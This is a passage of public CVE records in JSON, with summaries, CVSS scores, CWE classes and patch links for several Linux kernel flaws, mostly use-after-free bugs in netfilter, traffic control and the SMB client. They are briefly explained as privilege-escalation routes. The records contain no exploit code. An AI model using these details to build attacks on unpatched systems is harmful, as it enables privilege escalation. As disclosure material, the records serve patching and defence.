            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-362",
              "description": "CWE-362 Race Condition",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-12-24T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ec7eede369fe5b0d085ac51fdbb95184f87bfc6c"
        },
        {
          "url": "https://vuldb.com/?id.211018"
        },
        {
          "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
        },
        {
          "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
        }
      ],
      "title": "Linux Kernel kcm kcmsock.c kcm_tx_work race condition",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3521",
    "datePublished": "2022-10-16T00:00:00",
    "dateReserved": "2022-10-16T00:00:00",
    "dateUpdated": "2024-08-03T01:14:02.040Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-4623
Vulnerability from cvelistv5
Published
2023-09-06 13:56
Modified
2024-08-02 07:31
Severity
Summary
Use-after-free in Linux kernel's net/sched: sch_hfsc (HFSC qdisc traffic control) component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:31:06.625Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b3d26c5702c7d6c45456326e56d2ccf3f103e60f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/b3d26c5702c7d6c45456326e56d2ccf3f103e60f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.6",
              "status": "affected",
              "version": "2.6.12",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Budimir Markovic"
        }
      ],
      "datePublic": "2023-08-26T01:57:54+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: sch_hfsc (HFSC qdisc traffic control) component can be exploited to achieve local privilege escalation.\n\nIf a class with a link-sharing curve (i.e. with the HFSC_FSC flag set) has a parent without a link-sharing curve, then init_vf() will call vttree_insert() on the parent, but vttree_remove() will be skipped in update_vf(). This leaves a dangling pointer that can cause a use-after-free.\n\nWe recommend upgrading past commit b3d26c5702c7d6c45456326e56d2ccf3f103e60f.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-09-06T13:56:57.295Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b3d26c5702c7d6c45456326e56d2ccf3f103e60f"
        },
        {
          "url": "https://kernel.dance/b3d26c5702c7d6c45456326e56d2ccf3f103e60f"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
        },
        {
          "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s net/sched: sch_hfsc (HFSC qdisc traffic control) component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-4623",
    "datePublished": "2023-09-06T13:56:57.295Z",
    "dateReserved": "2023-08-30T11:58:12.267Z",
    "dateUpdated": "2024-08-02T07:31:06.625Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-3776
Vulnerability from cvelistv5
Published
2023-07-21 20:49
Modified
2024-08-02 07:08
Severity
Summary
Use-after-free in Linux kernel's net/sched: cls_fw component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:08:49.975Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=0323bce598eea038714f941ce2b22541c46d488f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/0323bce598eea038714f941ce2b22541c46d488f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5480"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5492"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20240202-0003/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.5",
              "status": "affected",
              "version": "2.6",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Muhammad Alifa Ramdhan of STAR Labs SG"
        }
      ],
      "datePublic": "2023-07-07T02:10:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eA use-after-free vulnerability in the Linux kernel\u0027s net/sched: cls_fw component can be exploited to achieve local privilege escalation.\u003c/p\u003e\u003cp\u003eIf tcf_change_indev() fails, fw_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.\u003c/p\u003e\u003cp\u003eWe recommend upgrading past commit 0323bce598eea038714f941ce2b22541c46d488f.\u003c/p\u003e"
            }
          ],
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: cls_fw component can be exploited to achieve local privilege escalation.\n\nIf tcf_change_indev() fails, fw_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.\n\nWe recommend upgrading past commit 0323bce598eea038714f941ce2b22541c46d488f.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-07-22T09:43:27.743Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=0323bce598eea038714f941ce2b22541c46d488f"
        },
        {
          "url": "https://kernel.dance/0323bce598eea038714f941ce2b22541c46d488f"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5480"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5492"
        },
        {
          "url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
        },
        {
          "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240202-0003/"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s net/sched: cls_fw component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-3776",
    "datePublished": "2023-07-21T20:49:53.667Z",
    "dateReserved": "2023-07-19T15:50:20.757Z",
    "dateUpdated": "2024-08-02T07:08:49.975Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-42432
Vulnerability from cvelistv5
Published
2023-03-29 00:00
Modified
2024-08-03 13:10
Severity
Summary
This vulnerability allows local attackers to disclose sensitive information on affected installations of the Linux Kernel 6.0-rc2. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the nft_osf_eval function. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the kernel. Was ZDI-CAN-18540.
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T13:10:40.840Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.zerodayinitiative.com/advisories/ZDI-22-1457/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://patchwork.ozlabs.org/project/netfilter-devel/patch/20220907082618.1193201-1-pablo%40netfilter.org/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.0-rc2"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Gwangun Jung at THEORI"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "This vulnerability allows local attackers to disclose sensitive information on affected installations of the Linux Kernel 6.0-rc2. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the nft_osf_eval function. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the kernel. Was ZDI-CAN-18540."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "LOW",
            "baseScore": 5.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:L",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-457",
              "description": "CWE-457: Use of Uninitialized Variable",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-03-29T00:00:00",
        "orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
        "shortName": "zdi"
      },
      "references": [
        {
          "url": "https://www.zerodayinitiative.com/advisories/ZDI-22-1457/"
        },
        {
          "url": "https://patchwork.ozlabs.org/project/netfilter-devel/patch/20220907082618.1193201-1-pablo%40netfilter.org/"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
    "assignerShortName": "zdi",
    "cveId": "CVE-2022-42432",
    "datePublished": "2023-03-29T00:00:00",
    "dateReserved": "2022-10-03T00:00:00",
    "dateUpdated": "2024-08-03T13:10:40.840Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-5197
Vulnerability from cvelistv5
Published
2023-09-26 10:04
Modified
2024-08-02 07:52
Severity
Summary
Use-after-free in Linux kernel's netfilter: nf_tables component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:52:08.142Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f15f29fd4779be8a418b66e9d52979bb6d6c2325"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/f15f29fd4779be8a418b66e9d52979bb6d6c2325"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.6",
              "status": "affected",
              "version": "5.9",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Kevin Rich"
        }
      ],
      "datePublic": "2023-09-08T01:25:23+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nAddition and removal of rules from chain bindings within the same transaction causes leads to use-after-free.\n\nWe recommend upgrading past commit f15f29fd4779be8a418b66e9d52979bb6d6c2325.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-09-26T10:04:37.147Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f15f29fd4779be8a418b66e9d52979bb6d6c2325"
        },
        {
          "url": "https://kernel.dance/f15f29fd4779be8a418b66e9d52979bb6d6c2325"
        },
        {
          "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-5197",
    "datePublished": "2023-09-26T10:04:37.147Z",
    "dateReserved": "2023-09-26T09:43:24.384Z",
    "dateUpdated": "2024-08-02T07:52:08.142Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-4244
Vulnerability from cvelistv5
Published
2023-09-06 13:53
Modified
2024-08-02 07:24
Severity
Summary
Use-after-free in Linux kernel's netfilter: nf_tables component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:24:03.697Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e91b0ebd994635df2346353322ac51ce84ce6d8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/3e91b0ebd994635df2346353322ac51ce84ce6d8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.5",
              "status": "affected",
              "version": "0.0",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Bien Pham from Team Orca of Sea Security Team"
        }
      ],
      "datePublic": "2023-08-10T17:47:08+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nDue to a race condition between nf_tables netlink control plane transaction and nft_set element garbage collection, it is possible to underflow the reference counter causing a use-after-free vulnerability.\n\nWe recommend upgrading past commit 3e91b0ebd994635df2346353322ac51ce84ce6d8.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-09-06T13:53:24.873Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e91b0ebd994635df2346353322ac51ce84ce6d8"
        },
        {
          "url": "https://kernel.dance/3e91b0ebd994635df2346353322ac51ce84ce6d8"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-4244",
    "datePublished": "2023-09-06T13:53:24.873Z",
    "dateReserved": "2023-08-08T15:36:07.559Z",
    "dateUpdated": "2024-08-02T07:24:03.697Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-5345
Vulnerability from cvelistv5
Published
2023-10-03 02:33
Modified
2024-08-02 07:52
Severity
Summary
Use-after-free in Linux kernel's fs/smb/client component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:52:08.630Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e6e43b8aa7cd3c3af686caf0c2e11819a886d705"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/e6e43b8aa7cd3c3af686caf0c2e11819a886d705"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5PDNWPKAP3WL5RQZ4RIDS6MG32OHH5R/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GISYSL3F6WIEVGHJGLC2MFNTUXHPTKQH/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPMICQ2HVZO5UAM5KPXHAZKA2U3ZDOO6/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.6",
              "status": "affected",
              "version": "0.0",
              "versionType": "custom"
            }
          ]
        }
      ],
      "datePublic": "2023-09-28T19:49:51+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s fs/smb/client component can be exploited to achieve local privilege escalation.\n\nIn case of an error in smb3_fs_context_parse_param, ctx-\u003epassword was freed but the field was not set to NULL which could lead to double free.\n\nWe recommend upgrading past commit e6e43b8aa7cd3c3af686caf0c2e11819a886d705.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-10-03T02:33:06.684Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e6e43b8aa7cd3c3af686caf0c2e11819a886d705"
        },
        {
          "url": "https://kernel.dance/e6e43b8aa7cd3c3af686caf0c2e11819a886d705"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5PDNWPKAP3WL5RQZ4RIDS6MG32OHH5R/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GISYSL3F6WIEVGHJGLC2MFNTUXHPTKQH/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPMICQ2HVZO5UAM5KPXHAZKA2U3ZDOO6/"
        },
        {
          "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s fs/smb/client component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-5345",
    "datePublished": "2023-10-03T02:33:06.684Z",
    "dateReserved": "2023-10-02T23:43:23.770Z",
    "dateUpdated": "2024-08-02T07:52:08.630Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-3777
Vulnerability from cvelistv5
Published
2023-09-06 13:50
Modified
2024-08-02 07:08
Severity
Summary
Use-after-free in Linux kernel's netfilter: nf_tables component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:08:50.184Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
